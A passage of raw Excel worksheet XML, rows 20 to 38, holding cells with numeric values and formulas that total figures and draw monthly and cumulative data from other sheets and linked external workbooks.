      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'19'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]20'!$W$73</f>
        <v>107.407178482557</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]20'!$X$73</f>
        <v>111.624107622448</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]20'!$Y$73</f>
        <v>238.905579269591</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]20'!$T$73</f>
        <v>62.6250041666667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]20'!$U$73</f>
        <v>3.73125416666667</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]20'!$V$73</f>
        <v>68.263186923258</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]20'!$Q$73</f>
        <v>15.030001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]20'!$R$73</f>
        <v>17.91002</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]20'!$S$73</f>
        <v>5799.640361</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]20'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]20'!$E$22</f>
        <v>8243</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'19'!H21</f>
        <v>143201</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2252639</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]20'!$I$22</f>
        <v>7650.42</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'19'!K21</f>
        <v>161402.72</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2227856.72</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]20'!$L$22</f>
        <v>64851.59</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>137.982106382979</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209" t="e">
        <f>'[13]20'!$W$81</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]20'!$X$81</f>
        <v>281.291190028063</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]20'!$Y$81</f>
        <v>275.953276416928</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]20'!$T$81</f>
        <v>0</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]20'!$U$81</f>
        <v>30.8086805555556</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]20'!$V$81</f>
        <v>35.8244467984934</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]20'!$Q$81</f>
        <v>0</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]20'!$R$81</f>
        <v>147.881666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]20'!$S$81</f>
        <v>3043.645</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]20'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]20'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'19'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]20'!$I$17</f>
        <v>6965.79</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'19'!K22</f>
        <v>130857.36</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2022318.74</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]20'!$L$17</f>
        <v>121768.992</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>60.884496</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]20'!$W$79</f>
        <v>116.458822076799</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]20'!$X$79</f>
        <v>101.419745176399</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]20'!$Y$79</f>
        <v>102.209692150613</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]20'!$T$79</f>
        <v>9.3738425925926</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]20'!$U$79</f>
        <v>48.3222800925926</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]20'!$V$79</f>
        <v>45.545030994978</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]20'!$Q$79</f>
        <v>2.24972222222222</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]20'!$R$79</f>
        <v>231.946944444444</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]20'!$S$79</f>
        <v>3869.50583333333</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]20'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]20'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'19'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]20'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'19'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]20'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]20'!$W$80</f>
        <v>83.5158854343833</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]20'!$X$80</f>
        <v>84.9834956665962</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]20'!$Y$80</f>
        <v>79.4539748979254</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]20'!$T$80</f>
        <v>17.0127314814815</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]20'!$U$80</f>
        <v>32.0307291666667</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]20'!$V$80</f>
        <v>32.4694365976146</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]20'!$Q$80</f>
        <v>4.08305555555556</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]20'!$R$80</f>
        <v>153.7475</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]20'!$S$80</f>
        <v>2758.60333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]20'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]20'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'19'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]20'!$I$56</f>
        <v>1406.79</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'19'!K24</f>
        <v>27174.58</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>307001.11</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]20'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]20'!$R$6</f>
        <v>95.1794871794872</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]20'!$S$6</f>
        <v>84.5828779599271</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]20'!$T$6</f>
        <v>86.0639778713729</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]20'!$O$6</f>
        <v>40.625</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]20'!$P$6</f>
        <v>57.1875</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]20'!$Q$6</f>
        <v>52.5943973634652</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]20'!$L$6</f>
        <v>9.75</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]20'!$M$6</f>
        <v>274.5</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]20'!$N$6</f>
        <v>4468.42</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]20'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'19'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]20'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'19'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]20'!$R$7</f>
        <v>192.717948717949</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]20'!$S$7</f>
        <v>196.715284715285</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]20'!$T$7</f>
        <v>188.106945513863</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]20'!$O$7</f>
        <v>40.625</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]20'!$P$7</f>
        <v>52.1354166666667</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]20'!$Q$7</f>
        <v>50.2922551789077</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]20'!$L$7</f>
        <v>9.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]20'!$M$7</f>
        <v>250.25</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]20'!$N$7</f>
        <v>4272.83</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'19'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'19'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]20'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]20'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]20'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]20'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]20'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]20'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]20'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]20'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]20'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'19'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'19'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]20'!$W$69</f>
        <v>21.9844093910492</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]20'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]20'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]20'!$T$69</f>
        <v>88.875</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]20'!$U$69</f>
        <v>79.5104166666667</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]20'!$V$69</f>
        <v>69.0034133709981</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]20'!$Q$69</f>
        <v>21.33</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]20'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]20'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'19'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'19'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]20'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]20'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]20'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]20'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]20'!$U$104</f>
        <v>48.118125</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]20'!$V$104</f>
        <v>63.4535899246704</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]20'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]20'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]20'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'19'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'19'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]20'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]20'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]20'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]20'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]20'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]20'!$V$105</f>
        <v>33.0059086629002</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]20'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]20'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]20'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'19'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'19'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]20'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]20'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]20'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]20'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]20'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]20'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]20'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]20'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]20'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]20'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]20'!$E$16</f>
        <v>4182</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'19'!H31</f>
        <v>96613</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1469620</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]20'!$I$16</f>
        <v>4704.27</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'19'!K31</f>
        <v>96277.56</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1452325.69</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]20'!$L$16</f>
        <v>65764.81</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>87.6864133333333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'[11]20'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]20'!$E$13</f>
        <v>5452</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'19'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]20'!$I$13</f>
        <v>2714</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'19'!K32</f>
        <v>71467</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1092945</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]20'!$L$13</f>
        <v>74639.736</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>149.279472</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]20'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]20'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]20'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]20'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]20'!$U$76</f>
        <v>3.95833333333333e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]20'!$V$76</f>
        <v>4.10781544256121e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]20'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]20'!$R$76</f>
        <v>1.9e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]20'!$S$76</f>
        <v>3.49e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]20'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'19'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]20'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'19'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]20'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]20'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]20'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]20'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]20'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]20'!$U$77</f>
        <v>2.08333333333333e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]20'!$V$77</f>
        <v>59.5553201506605</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]20'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]20'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]20'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]20'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'19'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]20'!$I$50</f>
        <v>800.639999999999</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'19'!K34</f>
        <v>17404.77</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>484607.7</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]20'!$L$15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'[11]20'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'19'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]20'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'19'!K35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G36+'19'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'19'!K36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G37+'19'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'19'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]20'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]20'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]20'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'19'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]20'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'19'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]20'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'19'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'19'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]20'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]20'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
